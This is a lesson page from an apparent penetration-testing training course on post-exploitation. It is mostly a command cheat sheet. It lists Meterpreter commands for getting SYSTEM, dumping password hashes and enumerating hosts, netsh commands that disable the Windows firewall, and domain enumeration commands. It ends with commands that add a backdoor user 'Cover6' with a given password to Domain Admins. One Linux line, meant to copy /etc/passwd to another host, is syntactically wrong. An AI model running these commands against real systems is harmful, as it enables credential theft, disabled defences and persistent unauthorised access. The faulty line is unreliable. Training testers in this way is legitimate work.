#PentesterPrep

Previous Lesson
Next Lesson

Post-Exploitation

#PentesterPrep Post-Exploitation

Meterpreter

Meterpreter is an advanced payload that is part of the Metasploit Framework. It uses a reverse shell to create a connection back to the attacking machine. Meterpreter resides completely in the memory of a target machine and writes nothing to disk. It also does not spawn any new processes but rather injects itself into an existing process. It communicates over an encrypted channel and offers the attacker several useful pentesting features including a command shell, the ability to run executables, file send/receive, and network profiling.

Assuming you have a meterpreter shell on a windows host, you can use the following commands:

meterpreter > getsystem
meterpreter > getuid
meterpreter > run winenum
meterpreter > sysinfo
meterpreter > ipconfig
meterpreter > run get_local_subnet
meterpreter > enumdesktops
meterpreter > webcam_list
meterpreter > run post/windows/gather/smart_hashdump
meterpreter > run post/windows/gather/enum_applications
meterpreter > run post/windows/gather/enum_logged_on_users
meterpreter > run post/windows/gather/enum_shares
meterpreter > run post/windows/gather/checkvm
meterpreter > background

Upon exploitation of a Linux host, the screen may be blank but from here you can input your standard Linux post-exploitation commands.

# ifconfig
# whoami
# netstat -antp
# cat /etc/passwd >> root@10.0.1.21:/root

Firewalls

C:> netsh advfirewall show rule name=all
C:> netsh advfirewall set allprofile state off
C:> netsh advfirewall set allprofile state on

Domain Enumeration

The following commands, with the proper privileges, allow for Windows domain enumeration.

C:> net users
C:> net user  /domain
C:> net user  
C:> net users /domain
C:> net groups /domain
C:> net groups “Domain Admins” /domain

Adding a user to the Domain

Upon successfully enumerating the system/network and acquiring domain administrator privileges it is now time to add the user Cover6 with the password Cover6#C6S to the network/domain. The command to do this from a Windows host is:

C:> net user Cover6 Cover6#C6S /ADD /DOMAIN

Adding a user to the Domain Admins group

Upon successfully adding the user Cover6 to the domain, it is now time to add the user to the Domain Admins group. The command to do this from a Windows prompt is:

C:> net group “Domain Admins” Cover6 /ADD /DOMAIN
Previous Lesson
Back to Course
Next Lesson
Scroll to Top